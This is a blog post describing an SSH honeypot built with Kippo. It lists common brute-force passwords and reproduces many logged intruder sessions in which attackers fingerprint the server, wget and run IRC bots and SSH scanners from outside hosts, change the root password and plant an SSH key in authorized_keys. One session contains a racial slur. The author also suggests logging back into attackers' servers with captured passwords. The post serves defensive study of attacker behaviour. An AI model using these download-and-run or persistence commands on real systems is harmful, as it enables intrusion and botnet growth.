Running A SSH Honeypot With Kippo: Let’s Catch Some Script Kiddies

Introduction

While exploring Fail2Ban during one of my previous posts, it amazed me how many break-in attempts I received, trying to brute force passwords on the SSH daemon. To recap, Fail2Ban does this:

Fail2ban scans log files like /var/log/pwdfail or /var/log/apache/error_log and bans IP that makes too many password failures. It updates firewall rules to reject the IP address.

There are many articles (this is one of them) on the web which describe how you can harden your SSH server, like preventing root logins, to give an example. After getting one Fail2Ban warning after another, I decided to also move my SSH server to another port. And lo and behold, the attacks stopped almost completely. This is an example of security through obscurity, of course, but it shows that most of the attacks are performed by bots or script kiddies who don’t look further than port 22, so why not implement this simple chance.

Of course, now port 22 was free to do something else…

Enter Kippo

Around this time (a few months ago), I also came across a program called Kippo:

Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.

Kippo is written in Python and pretty easy to install (the required dependencies are all listed on the homepage). The only thing which needs a bit of setting up is getting Kippo to listen to port 22 (we want our honeypot to catch as much as possible). This wiki page describes how to do just that.

Kippo does not need much setting up, and comes with a lot of Linux commands re-implemented (like wget, adduser, apt-get). The most important thing to do is to take look at kippo.cfg and to create the simulated file system using utils/createfs.py. You can also easily add other commands if you’re know what you’re doing (take a look in txtcmds/ and kippo/commands/).

After waiting for a week, I examined the logs to find out which passwords were used to try to login at the honeypot. By default, Kippo only comes with one root password it will accept (“123456”), but you can use the utils/passdb.py script to add more. I added these most commonly tried passwords:

  • aditzul92
  • admin1
  • enter
  • fuckoff
  • god
  • lacramioara
  • letmein
  • linux
  • love
  • passwd
  • r00t
  • rootroot
  • secret
  • sex
  • snickhacklol123
  • test
  • 070790
  • 123456
  • 1q2wazsx
  • administrator
  • dragon
  • fuck
  • manager
  • monkey
  • p0p0c@t3p3tldiej
  • password
  • q1w2e3r4
  • root1
  • swordfish

It’s well known that brute force programs use so called wordlists which contain the most common passwords to try and break in into a server. If you notice that one of your used passwords is present in the list above, I would strongly suggest to change it. Then, I waited…

A few months later

When looking at my logs now, I’ve had thousands of break-in attempts, hundreds of which “succeeded”. The interesting thing about Kippo is that it actually logs the shell session of the hacker. These shell sessions can be divided into three categories:

  1. People who immediately leave once they’re logged in, probably to come back later or just take note that this server is indeed available.
  2. People who do some basic fingerprinting of the server, using w, /proc/cpuinfo, uptime and uname -a to figure out the basics of the server. Most hackers also used wget to download a large file to test the download rate of the server. Funnily enough, this was almost always the Windows 2000 SP3. Probably because it’s (a) a large file and (b) hosted by a server you know is fast (Microsoft) and (c) is one of the few files on Microsoft’s website which is still hotlinkable.
  3. People who performed some fingerprinting and proceeded to download and extract malware. Here Kippo intercepted the attempts to run executables and showed some bogus error messages, after which the hackers disconnected.

Viewing the logs allows for some interesting observations:

  • Most of the attempts aren’t thorough. Most hackers quickly move on when an attempt seems to fail.
  • The tools used have been repacked and rewritten multiple times. Most of the tools are outdated, contain leftover files from previous installations or attempts, or contain weak attempts at automation shell scripts (with even sillier ASCII art).
  • The main reasons for hacking a server seems to be: (a) installing tools to hack more servers, (b) installing hidden web servers, (c) installing IRC daemons or bouncers, (d) installing IRC bots. Surprisingly, almost none of the hackers tried to completely nuke the system.
  • A few hackers spotted that a honeypot was in place. Most did not, despite the fact that Kippo is sometimes very blatant about this fact, by taunting with fake error messages.
  • It seems that the hackers (I actually mean “script kiddies” whenever I say “hackers”) are following some kind of memorized script. Most of the attempts used to exact same fingerprinting and tried to execute the exact same tools. It makes one wonder if there’s a “SSH hacking school” out there somewhere. More realistically speaking, there probably is a “hacking tutorial” on a forum somewhere showing which commands you have to execute.

A look at some attempts

Let’s look at some of the shell sessions, shall we? I wanted to show an exact replay of the terminal sessions (like the demos on the Kippo homepage, but this proved to be too difficult. (Kippo’s log files are not easily read, and while I did code up a conversion tool and the basics of a Javascript replaying script, it under performed on browsers other than Chrome, and I decided it was not worth further effort).

First example

This attempt shows some of the basic fingerprinting performed by the hackers, and Kippo’s faked response. Afterwards, the hacker tries to download an IRC bot. Kippo taunts with an “O RLY” message.

server:~# w
 23:40:45 up 14 days,  3:53,  1 user,  load average: 0.08, 0.02, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    188.131.103.31    23:33    0.00s  0.00s  0.00s w

server:~# uptime
 23:30:42 up 14 days,  3:53,  0 users,  load average: 0.08, 0.02, 0.01

server:~# cat /proc/cpuinfo
processor    : 0
vendor_id    : GenuineIntel
cpu family    : 6
model        : 23
model name    : Intel(R) Core(TM)2 Duo CPU     E8200  @ 2.66GHz
stepping    : 6
cpu MHz        : 2133.305
cache size    : 6144 KB
physical id    : 0
siblings    : 2
core id        : 0
cpu cores    : 2
apicid        : 0
initial apicid    : 0
fpu        : yes
fpu_exception    : yes
cpuid level    : 10
wp        : yes
flags        : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips    : 4270.03
clflush size    : 64
cache_alignment    : 64
address sizes    : 36 bits physical, 48 bits virtual
power management:
processor    : 1
vendor_id    : GenuineIntel
cpu family    : 6
model        : 23
model name    : Intel(R) Core(TM)2 Duo CPU     E8200  @ 2.66GHz
stepping    : 6
cpu MHz        : 2133.305
cache size    : 6144 KB
physical id    : 0
siblings    : 2
core id        : 1
cpu cores    : 2
apicid        : 1
initial apicid    : 1
fpu        : yes
fpu_exception    : yes
cpuid level    : 10
wp        : yes
flags        : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips    : 4266.61
clflush size    : 64
cache_alignment    : 64
address sizes    : 36 bits physical, 48 bits virtual
power management:

server:~# uname -a
Linux server 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux

server:~# ls -a
.         ..        .debtags  .viminfo  .aptitude .profile  .bashrc

server:~# ps x
  PID TTY          TIME CMD
 5673 pts/0    00:00:00 bash
 5677 pts/0    00:00:00 ps x

server:~# wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
--2011-01-26 23:31:12--  http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
Connecting to download.microsoft.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 130978672 (124M) [application/octet-stream]
Saving to: `W2Ksp3.exe
 7% [===>                                   ] 10,422,763   1731K/s  eta 1m 9s^C
200 OK

server:~# rm -rf W2Ksp3.exe

server:~# wget http://eu-ro.ca/img.tar
--2011-01-26 23:31:31--  http://eu-ro.ca/img.tar
Connecting to eu-ro.ca:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 659886 (644K) [application/x-tar]
Saving to: `img.tar
100%[======================================>] 659,886      219K/s  eta 0s
2011-01-26 23:31:34 (219 KB/s) - `img.tar' saved [659886/659886]

server:~# tar zxvf img.tar
.img
.img/start
.img/run
.img/r
.img/r/rversions.e
.img/r/rtsay.e
.img/r/rsignoff.e
.img/r/rsay.e
.img/r/rpickup.e
.img/r/rnicks.e
.img/r/rkicks.e
.img/r/rinsult.e
.img/r/raway.e
.img/pico
.img/m.help
.img/inst
.img/bash
.img/autorun
.img
.img/start
.img/run
.img/r
.img/r/rversions.e
.img/r/rtsay.e
.img/r/rsignoff.e
.img/r/rsay.e
.img/r/rpickup.e
.img/r/rnicks.e
.img/r/rkicks.e
.img/r/rinsult.e
.img/r/raway.e
.img/pico
.img/m.help
.img/inst
.img/bash
.img/autorun

server:~# cd .img

server:/root/.img# chmod +x *

server:/root/.img# ./start +s
  ___
 {o,o}
 |)__)
 -"-"-
O RLY? cd
  ___
 {o,o}
 |)__)
 -"-"-
O RLY? cd ..
  ___
 {o,o}
 |)__)
 -"-"-
O RLY?

Second example

Another one (I’ve removed the fingerprinting from now on). Here, ftp, apt-get and yum are tried before settling with wget. Another interesting thing to see here is that the tool is actually stored in what “looks” like an image file: scanmorf.jpg. Changing the extension is a tactic often used to upload files to web servers who only perform some basic filename checks. In this case, root-arhive.do.am might be an innocent, hacked website. The pscan tool used here will return often and is used to scan IP blocks for open SSH servers.

server:~# ftp zorro89.trei.ro
bash: ftp: command not found

server:~# apt-get
E: Could not open lock file /var/lib/apt/lists/lock - open (13: Permission denied)
E: Unable to lock the list directory

server:~# yum
bash: yum: command not found

server:~# wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.

server:~# http://root-arhive.do.am/scanner/scanmorf.jpg ; tar zxvf scanmorf.jpg ; cd .shm.xcgi?F6=1 ; chmod wget +x *
--2011-01-26 23:53:38--  http://root-arhive.do.am/scanner/scanmorf.jpg
Connecting to root-arhive.do.am:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12466 (12K) [image/jpeg]
Saving to: `scanmorf.jpg
100%[======================================>] 12,466       2K/s  eta 4s

2011-01-26 23:53:38 (2 KB/s) - `scanmorf.jpg' saved [12466/12466]

.shm.xcgi?F6=1
.shm.xcgi?F6=1/12.pscan.80
.shm.xcgi?F6=1/Horde
.shm.xcgi?F6=1/sd.pscan.80
.shm.xcgi?F6=1/h
.shm.xcgi?F6=1/a
.shm.xcgi?F6=1/23.pscan.80
.shm.xcgi?F6=1/paths
.shm.xcgi?F6=1/ps
.shm.xcgi?F6=1/a.pl
.shm.xcgi?F6=1/scan

server:/root/.shm.xcgi?F6=1# ls
12.pscan.80 Horde       sd.pscan.80 h           a           23.pscan.80 paths       ps          a.pl        scan

server:/root/.shm.xcgi?F6=1# ls -all
drwxr-xr-x 1 root root  4096 2011-01-26 23:53 .
drwxr-xr-x 1 root root  4096 2011-01-26 23:53 ..
-rwxr-xr-x 1 root root     0 2011-01-22 02:25 12.pscan.80
-rwxr-xr-x 1 root root 14372 2011-01-22 02:28 Horde
-rwxr-xr-x 1 root root  9516 2011-01-22 02:25 sd.pscan.80
-rwxr-xr-x 1 root root  2720 2006-05-05 15:56 h
-rwxr-xr-x 1 root root    23 2006-05-05 15:55 a
-rw-r--r-- 1 root root     0 2011-01-22 02:28 23.pscan.80
-rwxr-xr-x 1 root root    50 2006-05-05 15:56 paths
-rwxr-xr-x 1 root root 13432 2011-01-22 02:28 ps
-rwxr-xr-x 1 root root  1165 2006-05-05 15:56 a.pl
-rwxr-xr-x 1 root root   857 2011-01-22 02:28 scan

server:/root/.shm.xcgi?F6=1# ./scan 88.198
  ___
 {o,o}
 |)__)
 -"-"-
O RLY? y
  ___
 {o,o}
 (__(|
 -"-"-
NO WAI!

server:/root/.shm.xcgi?F6=1# ./a 88.198
error while loading shared libraries: libgnome.so.32: cannot open shared object file: No such file or directory

Third example

Some intruders are friendly enough to change the root password for us. This would actually be an interesting concept to add to Kippo: when you notice a passwd command being executed, try to set up a reverse SSH connection to the attacker (probably possible since the attackers often use hacked servers themselves) and login with that password. When the same password is used during each hack attempt, we would probably be able to reclaim the originating server. Two tools are downloaded here. One is a flooding IRC bot, the other is a rehash of the pscan tool from above, with some automation shell scripts added (dubbed gosh here). It’s also interesting to note that most of the hackers try to cover their tracks by removing their downloads.

server:~# w
 23:35:44 up 14 days,  3:53,  1 user,  load average: 0.08, 0.02, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    82.57.163.232     23:35    0.00s  0.00s  0.00s w

server:~# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

server:~# cd ..

server:/# cd var

server:/var# cd tmp

server:/var/tmp# ls

server:/var/tmp# wget http://www.denysa.net/denysa/flood.tgz
--2011-01-26 23:36:24--  http://www.denysa.net/denysa/flood.tgz
Connecting to www.denysa.net:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 227324 (221K) [application/x-compressed]
Saving to: `flood.tgz

100%[======================================>] 227,324      51K/s  eta 2s

2011-01-26 23:36:26 (51 KB/s) - `flood.tgz' saved [227324/227324]

server:/var/tmp# wget http://gblteam.webs.com/gosh.tgz.tar
--2011-01-26 23:36:44--  http://gblteam.webs.com/gosh.tgz.tar
Connecting to gblteam.webs.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1642769 (1M) [application/x-tar]
Saving to: `gosh.tgz.tar

100%[======================================>] 1,642,769    658K/s  eta 0s

2011-01-26 23:36:46 (658 KB/s) - `gosh.tgz.tar' saved [1642769/1642769]

server:/var/tmp# tar zxvf gosh.tgz.tar
gosh
gosh/3
gosh/4
gosh/common
gosh/go.sh
gosh/scam
gosh/pscan2
gosh/ss
gosh/5
gosh/vuln.txt
gosh/1
gosh/mfu.txt
gosh/pass_file
gosh/gen-pass.sh
gosh/secure
gosh/2
gosh/ssh-scan
gosh/a

server:/var/tmp# cd gosh

server:/var/tmp/gosh# ls
3           4           common      go.sh       scam        pscan2
ss          5           vuln.txt    1           mfu.txt     pass_file
gen-pass.sh secure      2           ssh-scan    a

server:/var/tmp/gosh# touch bios.txt

server:/var/tmp/gosh# chmod +x *

server:/var/tmp/gosh# ./go.sh 114
  ___
 {o,o}
 |)__)
 -"-"-
O RLY? y

  ___
 {o,o}
 (__(|
 -"-"-
NO WAI!

server:/var/tmp/gosh# cd ..

server:/var/tmp# rm -rf gosh

server:/var/tmp# ls
flood.tgz    gosh.tgz.tar

server:/var/tmp# tar zxvf flood.tgz
f
f/1
f/P&·
f/¦·
f/b
f/b2
f/bang.txt
f/f
f/f4
f/fwd
f/hide
f/httpd
f/j
f/j2
f/mech.help
f/mech.set
f/s
f/sl
f/start.sh
f/std
f/stream
f/tty
f/v
f/v2
f/x

server:/var/tmp# cd f

server:/var/tmp/f# rm -rf f

server:/var/tmp/f# ls
1         P&·   ¦·  b         b2        bang.txt  f4        fwd
hide      httpd     j         j2        mech.help mech.set  s         sl
start.sh  std       stream    tty       v         v2        x

server:/var/tmp/f# ./httpd
unable to open display ":0"

server:/var/tmp/f# chmod +x *

server:/var/tmp/f# ./httpd
unable to open display ":0"

server:/var/tmp/f# cd..
bash: cd..: command not found

server:/var/tmp/f# cd ..

server:/var/tmp# rm -rf f

server:/var/tmp# ls
flood.tgz    gosh.tgz.tar

server:/var/tmp# rm -rf flood.tgz

server:/var/tmp# rm -rf gosh.tgz.tar93

Fourth example

Another attempt. Checking out the website http://eu-ro.ca/ reveals what seems to be a Romanian hacker group/set-up. Peeking in the bot configuration often reveals obscure IRC channels on Undernet. Following these channels quickly leads you to a whole set-up of channels, bots, and hackers. If you manage to lay low there, you can gain a lot of info (bot commands, group leaders, group set-up, targets and so on), but be prepared for some bans and insults as well. If I had some more spare time, I would set up a few dedicated honeypots (with more advanced shell simulation) and try to uncover more.

server:~# mkdir /tmp/.user

server:~# cd /tmp/.user

server:/tmp/.user# wget http://eu-ro.ca/.kde.tgz
--2011-01-26 23:46:15--  http://eu-ro.ca/.kde.tgz
Connecting to eu-ro.ca:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1238822 (1M) [application/x-gzip]
Saving to: `.kde.tgz

100%[======================================>] 1,238,822    327K/s  eta 0s

2011-01-26 23:46:19 (327 KB/s) - `.kde.tgz' saved [1238822/1238822]

server:/tmp/.user# tar zxvf .kde.tgz
.kde
.kde/pass_filees
.kde/pscan2
.kde/a1
.kde/common
.kde/pass_file
.kde/ssh-scan
.kde/auto
.kde/ss
.kde/go.sh
.kde/a
.kde/gen-pass.sh
.kde/start
.kde/vuln.txt
.kde
.kde/pass_filees
.kde/pscan2
.kde/a1
.kde/common
.kde/pass_file
.kde/ssh-scan
.kde/auto
.kde/ss
.kde/go.sh
.kde/a
.kde/gen-pass.sh
.kde/start
.kde/vuln.txt

server:/tmp/.user# cs .kde
bash: cs: command not found

server:/tmp/.user# cd .kde

server:/tmp/.user/.kde# ls -a
.           ..          pass_filees pscan2      a1          common
pass_file   ssh-scan    auto        ss          go.sh       a
gen-pass.sh start       vuln.txt

server:/tmp/.user/.kde# chmod +x *

server:/tmp/.user/.kde# ./a 210.133
unable to open display ":0"

server:/tmp/.user/.kde# chmod +x *

server:/tmp/.user/.kde# ./start 28
error while loading shared libraries: libgnome.so.32: cannot open shared object file: No such file or directory

server:/tmp/.user/.kde# cd ..

server:/tmp/.user# ls-a
bash: ls-a: command not found

server:/tmp/.user# ls -a
.        ..       .kde.tgz .kde     .kde

server:/tmp/.user# wget bila.do.am/bila.tgz
--2011-01-26 23:50:26--  http://bila.do.am/bila.tgz
Connecting to bila.do.am:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 262027 (255K) [application/octet-stream]
Saving to: `bila.tgz

100%[======================================>] 262,027      6K/s  eta 42s

2011-01-26 23:50:27 (6 KB/s) - `bila.tgz' saved [262027/262027]

server:/tmp/.user# tar zxvf bila.tgz
.tmp
.tmp/cyc.acc
.tmp/ -bash
.tmp/s.sh
.tmp/cyc.set
.tmp/pico
.tmp/stealth

server:/tmp/.user# ls -a
.        ..       .kde.tgz .kde     .kde     bila.tgz .tmp

server:/tmp/.user# cd .tmp

server:/tmp/.user/.tmp# ls -a
.       ..      cyc.acc  -bash  s.sh    cyc.set pico    stealth

server:/tmp/.user/.tmp# ./stealth
unable to open display ":0"

Fifth example

Another straightforward attempt. Also here, the website http://arhiva.do.am seems to be used as a dump for hosting malware.

server:~# wget http://arhiva.do.am/dabian.tgz
--2011-01-27 00:18:22--  http://arhiva.do.am/dabian.tgz
Connecting to arhiva.do.am:80... connected.
HTTP request sent, awaiting response... 404 Not Found

server:~# wget http://arhiva.do.am/arhiva.tgz
--2011-01-27 00:18:57--  http://arhiva.do.am/arhiva.tgz
Connecting to arhiva.do.am:80... connected.
HTTP request sent, awaiting response... 404 Not Found

server:~# wget http://arhiva.do.am/scan.tar
--2011-01-27 00:19:28--  http://arhiva.do.am/scan.tar
Connecting to arhiva.do.am:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1484800 (1M) [application/octet-stream]
Saving to: `scan.tar

100%[======================================>] 1,484,800    518K/s  eta 0s

2011-01-27 00:19:31 (518 KB/s) - `scan.tar' saved [1484800/1484800]

server:~# tar xvf scan.tar
scan
scan/sshf
scan/a6
scan/start
scan/pass_sh
scan/a5
scan/gen-pass.sh
scan/ssh-scan
scan/test.sh
scan/README
scan/200.pscan.22
scan/pass_file
scan/sshf0
scan/pscan2
scan/pico
scan/pass_filees
scan/vuln.txt
scan/a4
scan/a1
scan/a2
scan/mfu.txt
scan/a
scan/common

server:~# rm -rf scan.tar

server:~# ls -a
.         ..        .debtags  .viminfo  .aptitude .profile  .bashrc   scan

server:~# cd scan

server:/root/scan# ./a 64.189
Shall we play a game?

Sixth example

Another attempt. Here, three different malware programs are tried out before giving up. It’s also interesting to see where intruders hide their downloads, some use /root, some /tmp, some esoteric locations like /tmp/....

server:~# wget
wget: missing URL
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.

server:~# yum
bash: yum: command not found

server:~# wget freewebtown.com/pacalici/lib.tgz
--2011-02-09 00:30:57--  http://freewebtown.com/pacalici/lib.tgz
Connecting to freewebtown.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8772939 (8M) [application/x-tar]
Saving to: `lib.tgz

100%[======================================>] 8,772,939    1844K/s  eta 0s


2011-02-09 00:31:02 (1844 KB/s) - `lib.tgz' saved [8772939/8772939]

server:~# tar zxvf lib.tgz
lib
lib/mech.pid
lib/fuck
lib/j2
lib/v
lib/s
lib/r
lib/__libc_start_main
lib/std
lib/b
lib/bang.txt
lib/j
lib/1
lib/f4
lib/dir
lib/y2kupdate
lib/fwd
lib/x
lib/mech.set
lib/tty
lib/cron.d
lib/h
lib/sl
lib/b2
lib/W2Ksp3.exe
lib/tun.seen
lib/f
lib/h.c
lib/stream
lib/v2
lib/init

server:~# rm -rf lib.tgz

server:~# cd lib

server:/root/lib# ./y2kupdate
unable to open display ":0"

server:/root/lib# ./init
unable to open display ":0"

server:/root/lib# cd

server:~# ls
lib

server:~# cd /dev

server:/dev# wget freewebtown.com/pacalici/bf.tgz
--2011-02-09 00:32:05--  http://freewebtown.com/pacalici/bf.tgz
Connecting to freewebtown.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 392378 (383K) [application/x-tar]
Saving to: `bf.tgz

100%[======================================>] 392,378      9K/s  eta 39s

2011-02-09 00:32:06 (9 KB/s) - `bf.tgz' saved [392378/392378]

server:/dev# tar zxvf bf.tgz
mc-root
mc-root/go
mc-root/cyc.set
mc-root/cyc.help
mc-root/cyc.levels
mc-root/bash
mc-root/udp.pl
mc-root/stealth
mc-root/randfiles
mc-root/randfiles/randkicks.e
mc-root/randfiles/randaway.e
mc-root/randfiles/randsignoff.e
mc-root/randfiles/randinsult.e
mc-root/randfiles/randversions.e
mc-root/randfiles/randsay.e
mc-root/randfiles/randpickup.e
mc-root/randfiles/randnicks.e
mc-root/cyc.acc
mc-root/pico.tgz
mc-root/pico
mc-root/cyc.pid

server:/dev# rm -rf bf.tgz

server:/dev#

server:/dev# cd mc-root

server:/dev/mc-root# ./go
unable to open display ":0"

server:/dev/mc-root# ls
go         cyc.set    cyc.help   cyc.levels bash       udp.pl     stealth
randfiles  cyc.acc    pico.tgz   pico       cyc.pid

server:/dev/mc-root# cd

server:~#

server:~#

server:~# wget pibo.com/.x/scan/wtf.tar
--2011-02-09 00:35:09--  http://pibo.com/.x/scan/wtf.tar
Connecting to pibo.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1574103 (1M) [application/x-tar]
Saving to: `wtf.tar

100%[======================================>] 1,574,103    299K/s  eta 1s

2011-02-09 00:35:13 (299 KB/s) - `wtf.tar' saved [1574103/1574103]

server:~# tar xzvf wtf.tar
wtf
wtf/a
wtf/a1
wtf/auto
wtf/common
wtf/gen-pass.sh
wtf/go.sh
wtf/pass_file
wtf/pscan2
wtf/scam
wtf/sh
wtf/ss
wtf/ssh-scan
wtf/start
wtf/vuln.txt

server:~# cd wtf

server:/root/wtf# chmod +x *

server:/root/wtf# ./a 100
error while loading shared libraries: libgnome.so.32: cannot open shared object file: No such file or directory

server:/root/wtf#

Seventh example

Not only is this intruder very offensive, he also quickly spotted the honeypot.

server:~# adduser nigger
Adding user `nigger' ...
Adding new group `nigger' (1001) ...
Adding new user `nigger' (1001) with group `nigger' ...
Creating home directory `/home/nigger' ...
Copying files from `/etc/skel' ...
Password:
Password again:

Changing the user information for nigger

Enter the new value, or press ENTER for the default

        Username []:
Must enter a value!
        Username []: only
        Full Name []: dumb
        Room Number []: niggers
        Work Phone []: use
        Home Phone []: honeypot
        Mobile Phone []: you
        Country []: stupid
        City []: nigger
        Language []: HA
        Favorite movie []: HA
        Other []: HA
Is the information correct? [Y/n] y
ERROR: Some of the information you entered is invalid
Deleting user `nigger' ...
Deleting group `nigger' (1001) ...
Deleting home directory `/home/nigger' ...
Try again? [Y/n] n

Eight example

This guy tried adding his SSH keys and installing software again and again and was one of the most persistent intruders.

server:~# cd

server:~# ls -a
.         ..        .debtags  .viminfo  .aptitude .profile  .bashrc

server:~# cd /root

server:~# ls -a
.         ..        .debtags  .viminfo  .aptitude .profile  .bashrc

server:~# cd ..

server:/# ls -a
.          ..         sys        bin        mnt        media      vmlinuz
opt        cdrom      selinux    tmp        proc       sbin       etc
dev        srv        initrd.img lib        home       var        usr
boot       root       lost+found

server:/# cd

server:~# ls -a
.         ..        .debtags  .viminfo  .aptitude .profile  .bashrc

server:~# mkdir .ssh

server:~# cd .ssh

server:/root/.ssh# ls -a

server:/root/.ssh# echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys

server:/root/.ssh# ls  -a

server:/root/.ssh# dir
bash: dir: command not found

server:/root/.ssh# ls -a

server:/root/.ssh# cd ..

server:~# ls -a
.         ..        .debtags  .viminfo  .aptitude .profile  .bashrc   .ssh

server:~# rm -rf .ssh

server:~# cd .root
bash: cd: .root: No such file or directory

server:~# cd /root

server:~# ls -a
.         ..        .debtags  .viminfo  .aptitude .profile  .bashrc

server:~# mkdir .ssh

server:~# cd .ssh

server:/root/.ssh# echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys

server:/root/.ssh# cd ..

server:~# ls -a
.         ..        .debtags  .viminfo  .aptitude .profile  .bashrc   .ssh

server:~# rm -rf .ssh

server:~# cd ..

server:/# ls -a
.          ..         sys        bin        mnt        media      vmlinuz
opt        cdrom      selinux    tmp        proc       sbin       etc
dev        srv        initrd.img lib        home       var        usr
boot       root       lost+found

server:/# cd home

server:/home# ls -a
.       ..      richard

server:/home# cd ..

server:/# ls -a
.          ..         sys        bin        mnt        media      vmlinuz
opt        cdrom      selinux    tmp        proc       sbin       etc
dev        srv        initrd.img lib        home       var        usr
boot       root       lost+found

server:/# mkdir .ssh

server:/# cd .ssh

server:/.ssh# echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys

server:/.ssh# cd ..

server:/# ;s =a
bash: s: command not found

server:/#

server:/# ls -a
.          ..         sys        bin        mnt        media      vmlinuz
opt        cdrom      selinux    tmp        proc       sbin       etc
dev        srv        initrd.img lib        home       var        usr
boot       root       lost+found .ssh

server:/# rm -rf .ssh

server:/# cd

server:~# cd /tmp

server:/tmp# ls -a
.         ..        .ICE-unix .X11-unix

server:/tmp# mkdir ,

server:/tmp# cd ,

server:/tmp/,# wget http://pinky.clan.su/mech/fast.jpg ;  tar fast.jpg
--2011-03-02 21:07:41--  http://pinky.clan.su/mech/fast.jpg
Connecting to pinky.clan.su:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 821334 (802K) [image/jpeg]
Saving to: `fast.jpg

100%[======================================>] 821,334      113K/s  eta 0s

2011-03-02 21:07:49 (113 KB/s) - `fast.jpg' saved [821334/821334]

tar: You must specify one of the `-Acdtrux' options

Try `tar --help' or `tar --usage' for more information.

server:/tmp/,# tar zxvf fast.jpg
fast
fast/src
fast/src/xmech.o
fast/src/xmech.c
fast/src/vars.o
fast/src/vars.c
fast/src/userlist.o
fast/src/userlist.c
fast/src/usage.h
fast/src/text.h
fast/src/structs.h
fast/src/socket.o
fast/src/socket.c
fast/src/parse.o
fast/src/parse.c
fast/src/mcmd.h
fast/src/Makefile.in
fast/src/Makefile
fast/src/main.o
fast/src/main.c
fast/src/link.o
fast/src/link.c
fast/src/h.h
fast/src/global.h
fast/src/gencmd.c
fast/src/gencmd
fast/src/function.o
fast/src/function.c
fast/src/defines.h
fast/src/debug.o
fast/src/debug.c
fast/src/dcc.o
fast/src/dcc.c
fast/src/config.h.in
fast/src/config.h
fast/src/commands.o
fast/src/commands.c
fast/src/combot.o
fast/src/combot.c
fast/src/com-ons.o
fast/src/com-ons.c
fast/src/channel.o
fast/src/channel.c
fast/src/cfgfile.o
fast/src/cfgfile.c
fast/r
fast/r/rversions.e
fast/r/rtsay.e
fast/r/rsignoff.e
fast/r/rsay.e
fast/r/rpickup.e
fast/r/rnicks.e
